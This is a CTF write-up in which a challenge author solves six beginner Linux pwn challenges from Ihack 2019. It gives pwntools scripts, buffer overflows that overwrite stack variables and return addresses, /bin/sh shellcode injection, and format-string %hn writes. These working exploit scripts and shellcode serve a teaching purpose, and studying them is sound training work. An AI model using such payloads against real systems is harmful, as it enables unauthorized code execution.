[Hackfest] pwning challenges Ihack 2019

The Ihack CTF is a hacking competition organized 6 months before the Hackfest. This competition wants to be accessible to all levels. For more details, you can see the official website: https://ihack.computer/

For the 2019 edition, I created a track on Linux binary exploitation (pwning). I tried to build challenges in order to introduce beginners to this “world”. You can download and install the challenges on this github.

I don’t explain in depth some technical concepts. So, I will advise you to read some sections of the popular hacking book The art of exploitation before to begin a challenge.

1) Introduction to pwntools

To begin in pwning world, you need to have the right tools. In order to communicate with a remote program, one of the most popular tools is pwntools. It is written in Python and makes the binary exploitation really easier. NB: Don’t try to install pwntools to Windows, you will just lose your time! And anyway, the majority of tools to exploit a Linux binary is often compatible with Linux only.

For this challenge, you just need to give the number provided by the remote program. You need to give 10 good numbers. Of course, you need to do this in a very short time.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
import re
#remote allows to communicate with the program
p = remote('sushi.hfctf.org', 1111)

output = ""
while "FLAG" not in output:
	#recv allows to receive the data sends by the program
	output = p.recv()
	print(output)
	#regex to extract the number
	m = re.search("[0-9]{2}", output)
	if m is not None:
		#we send the answer
		p.sendline(m.group(0))

2) Reverse Engineering

Before to begin this challenge, it is preferable to learn basic of assembly language. I advise you to read the section 0x250 “Getting Your Hands Dirty” of the book The art of exploitation.

For this challenge, you need to use a disassembler and a Debugger. I will use ghidra and gdb.

You need to find the good password in the program. With ghidra and gdb is supposed to be easy to find the password.

With ghidra, we can see where the password is compared with our input and where is stored.

To be sure, we can verify this with gdb. Before, we need to find in ghidra the address where the function strcmp is called.

start
b *0x0804876a
c

We can see that the characters of the string are not printable with the command x/s 0xffffd1c9 (of course the value of the address on the stack can be different for you).

With gdb, we can see the hexadecimal value of the characters with the command x/15x 0xffffd1c9 (remember that a string finish always by a null character).

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org', 2222)
print(p.recv())
p.sendline("\x99\x83\xc8\x8a\x93\x8f\xea\x87\xbb\xac\xd2\x8e\xdd\x9b")
print(p.recv())
print(p.recv())

3) Play with the stack

Before to begin this challenge, it is preferable to learn how the memory segmentation and buffer overflow work. So, I advised you to read the section 0x270 “Memory Segmentation” and the section 0x320 “Buffer Overflows” of the book The art of exploitation.

You are the requirements to perform your first binary exploitation. Take a look at the program’s behavior.

If you enter a large input, you will see that the variables will be overwritten and the program will be crushed. The input is vulnerable to a buffer overflow attack (“erreur de segmentation” means “segmentation fault” in French).

Each variable is stored in the stack during the execution. The stack looks like this:

With pwntools, it is easy to find the good offset to control the values of the variables.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org', 3333)
print(p.recv())
p.sendline(cyclic(200))
print(p.recv())
print(p.recv())

from pwn import *
# v = 0x76 a = 0x61
# remember the stack: letter_4 is before the other letter
print(cyclic_find(0x61616176))
#result 84

We find the variables declaration. Below, we can see where the vulnerability is located.

scanf("%s", username);

The & has been forgotten for username. scanf needs to have a pointer for the second parameter. Because username is a string (char *), it is the reason why the function accept the parameter without the &. This mistakes makes the program vulnerable to a buffer overflow.

Further in the code, we can see some conditions where the key word and the password are verified.

We see that the good value for the keyword is L33T. So, with the following script, we can overwrite the letters with the good values:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

p = remote('sushi.hfctf.org', 3333)
print(p.recv())
p.sendline("A"*84+"T33L")
print(p.recv())
print(p.recv())

So the final step is to guess the good value for the password. We can see the good value in hexadecimal directly in the ASM code:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *

p = remote('sushi.hfctf.org', 3333)
print(p.recv())
#
p.sendline("A"*84+"T33L"+p32(0xdadafafa))
print(p.recv())
print(p.recv())

4) Overwrite the ret address

Now, you are able to control the values in the stack. The input of this challenge is vulnerable like the precedent. If you reverse the program, you see a function secret that print the flag but this function is never called in the program.

To jump on this function you need to redirect the program on this function. To do this, you need to overwrite the return address. What is the return address? When a program call a function, he needs to remember where is the execution point before the call in order to come back to this point after the execution of the function. So he is stored in the stack the address of this execution point before calling the function. This address is named “return address”. Each function is ended by a ret instruction. When this instruction is executed, the return address is popped and the execution flow is redirected to the return address.

To analyze this on the challenge, we need to get the address of the ret instruction. So with ghidra:

If we put a breakpoint on this address, we will see the value of the ret address:

We can see that the address 0x08048798 corresponds to the instruction just after the call of the challenge function:

If we enter a lot of A characters, we will see that the ret address is overwritten and consequently, the program crash:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal4')
#to attach gdbwith
gdb.attach(p)
print(p.recv())
p.sendline(cyclic(200))
# never fogert to add p.interactive()
# without this you can debug the program
# because we use a Python script to execute the program
# The program chal4 will be deleted on the memory when he ended
# https://reverseengineering.stackexchange.com/questions/15204/why-cant-gdb-read-memory-if-pwntools-is-used-to-send-input
p.interactive()

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
print(cyclic_find(0x61616169))
# result 32

With the good offset, we are able to write what ever we want in the return address:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal4')
#to attach gdbwith
gdb.attach(p)
print(p.recv())
p.sendline("A"*32+p32(0x08048688))
p.interactive()

The last step is to get the beginning of the function address and overwrite the ret address to get the flag:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org','1234')
print(p.recv())
p.sendline("A"*32+p32(0x))
print(p.recv())
print(p.recv())

5) Pop the shell

You are all the requirements to fully exploit a vulnerable program. It is recommended to read the section 0x330 “Experimenting with BASH” of the book The art of exploitation. You need to execute a shellcode to pop your shell. You don’t need to understand how to build a shellcode. Briefly, a shellcode is a piece of code that allows some action and often it is used to execute a shell (/bin/sh). For this challenge, you can use shellcode. The chapter 5 of the book The art of exploitation is a very good introduction to understand how to build a shellcode.

This challenge is more complicated to exploit than the others. But all of protection is disabled, no NX and no ASLR. To debug on your laptop, we need to disable the ASLR with the following command:

echo 0 > /proc/sys/kernel/randomize_va_space

I give you the addresses for each variable in the stack and if you read the output, only the value of food is preserved after the print. We can confirm this with ghidra:

Now, we need to find the vulnerable variable. If you take a look to the function called for the inputs, you will see that the function “gets” is called. gets is an old function and it does not have protection against buffer overflow. It is the reason why it is advised do not use this function.

So, if we input a lot of A’s characters to the address variable, the program will crash:

But why A’s characters are displayed everywhere? Remember how the stack looks on the program:

So when you input a lot of A’s characters to the address variable, the rest of the variable will be overwritten by A.

If you look at the beginning of the program, you will see that the argument of main and the environment variable has been deleted:

Consequently, it is not possible to place our shellcode in a variable environment and because name,color and address have been deleted, you need to place the shellcode in food.

Before this, you need to redirect the execution flow in food. Like the challenge 4, you need to find the good offset to overwrite the ret address.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal5')
gdb.attach(p)
print(p.recv())
p.sendline("toto")
print(p.recv())
p.sendline("sushi")
print(p.recv())
p.sendline("blue")
print(p.recv())
p.sendline(cyclic(200))
p.interactive()

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
print(cyclic_find(0x6261616d))
#result: 148

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal5')
gdb.attach(p)
print(p.recv())
p.sendline("toto")
print(p.recv())
p.sendline("sushi")
print(p.recv())
p.sendline("blue")
print(p.recv())
p.sendline(cyclic(148)+p32(0xffffd194))
p.interactive()

We can put a breakpoint to the ret instruction of challenges in order to see if the ret address is overwritten with the good value. So with ghidra we can see that the address of the ret instruction is 0x080487fe:

With the gdb command ni (for next instruction), we can see that the program is redirected to the right address. Because the food value is overwritten by the buffer overflow, we can’t write our shellcode directly in food. Instead, we need to write the shellcode through the address input with the good offset. We can get the offset through the gdb command x/x 0xffffd194:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
print(cyclic_find(0x61616170))
#result: 60

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal5')
gdb.attach(p)
print(p.recv())
p.sendline("toto")
print(p.recv())
p.sendline("sushi")
print(p.recv())
p.sendline("blue")
print(p.recv())

#The shellcode come from to http://shell-storm.org/shellcode/files/shellcode-811.php
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
#\x90 is the opcode for the NOP instruction, after the shellcode
# I prefer to
p.sendline("A"*60+shellcode+"A"*(148-60-len(shellcode))+p32(0xffffd194))
p.interactive()

For the remote program, you just need to replace the address of food and it will be worked!

6) Format string

This last challenge is supposed to be the hardest. I did not have the time to build this challenge like I wanted. After I see the number of validation, I think that the difficulty was high enough. Anyway…

To solve this challenge, you need to understand how the format string works. You can read the section 0x350 “Format Strings” of the book The art of exploitation.

NB: If the addresses in the stack change, it is because I didn’t write this write-up in one-time. So don’t be confused about this!

One of the first things you need to do to exploit a binary is to check the securities enabled with the following command:

And you see that only RELRO is full. It means that it is not possible to exploit the programs through the GOT. Now, it is time to reverse the program. Like for the challenge, it is not possible to place a shellcode in a variable environment.

The function “printf” is called without the format string parameter. It is a classic format string vulnerability. We can confirm this by entering a format string on the vulnerable call. The input need to begin by sushi in order to valid condition.

We see that the format string “%08x” is interpreted. You can also see that the address of the vulnerable variable is displayed. It will help you a lot when you exploit the program remotely.

We can’t exploit the format string through the GOT. But we can overwrite the ret address thanks to the format string parameter %n. But before this, we need enough space to put our shellcode. With Ghidra, we can check if the variable food is big enough for contains our shellcode:

250 is largely enough to put the shellcode. We need to find where the ret address is on the stack when the program print our input. First, we need to place a breakpoint to the ret address and see the value of the ret address on the stack. So with Ghidra:

Now, with gdb, we place a breakpoint to the address 0x08048695 with the following command:

And after to run the program, we can see that the value of the ret address is 0x80487b7 and it is located to the address 0xffffd33c on the stack.

I give the address of food so we just need to overwrite the ret address to jump into our variable. At the moment I write this write-up, the address of food is 0xffffd222. I will use the following shellcode:

\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80

So, we need to write d222+5 (because of the sushi characters) at the address 0xffffd33c and ffff at the address 0xffffd33e.

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e)

We need to find where is located \x3c\xd3\xff\xff and \x3e\xd3\xff\xff on the stack. To debug the program, I will use the following code:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process("./chal6")
gdb.attach(p)
payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e) + 20*"%x-"
print(p.recv())
p.sendline(payload)
#Never forget this line! without it the program will close and we cannot debug it!
p.interactive()

If you count, the two addresses are located in the 12th and 13th position. We can confirm this with the following payload:

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e) + "%12$08x%13$08x"

Now, we need to calculate the number of characters to print in order to write d227 at the address 0xffffd33c and ffff at the address 0xffffd33e.

sushi = 5 bytes
shellcode = 25 bytes
first and second adress = 8 bytes
total = 5 + 25 + 8 = 38
0xd227 equals 53799 in decimal
So the good value to print for 0xffffd33c is 53799-38=53761

0xd227 equals 53799 in decimal
0xffff equals 65535 in decimal
So the good value to print for 0xffffd33e is 65535-53799=11736

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process("./chal6")
gdb.attach(p)
payload = "sushi"
# 0xffffd222
payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e) + "%53761x%12$hn%11736x%13$hn"
print(p.recv())
p.sendline(payload)
p.interactive()

On the remote program because I give the address of food, you can calculate where the ret address is. You can get the good offset with the local addresses: 0xffffd33c - 0xffffd222 = 0x11a. In my case, the address of food is 0xffffdb82. So for 0xffffdb82 the ret address is located at 0xffffdb82+0x11a = 0xffffdc9c

sushi = 5 bytes
shellcode = 25 bytes
first and second adress = 8 bytes
total = 5 + 25 + 8 = 38
0xdb82+5 (because of the sushi characters don't forget!) equals 56199 in decimal
So the good value to print for 0xffffdc9c is 56199-38=56161

0xdb87 equals 56199  in decimal
0xffff equals 65535 in decimal
So the good value to print for 0xffffdc9e is 65535-56199=9336

So, finally we can get pop the shell and print the flag with the following code:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('127.0.0.1','1337')

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffdc9c) + p32(0xffffdc9e) + "%56161x%12$hn%9336x%13$hn"

print(p.recv())
p.sendline(payload)
p.interactive()

fmtstr_payload

Before the competition, my friend corb3nik tested my challenges and for the format string, he used a pwntools feature fmtstr_payload.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('127.0.0.1','1337')

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80"
#address of food
addr = 0xffffdb82
target = addr + len(payload)
#we write 0xffffdb87 on 0xffffdc9c (where the ret address is located on the stack)
data = {
   0xffffdc9c : addr + 5
}

fmt = fmtstr_payload(5 + len(payload)/4, data, numbwritten=len(payload))

print(p.recv())
p.sendline(payload+fmt)
p.interactive()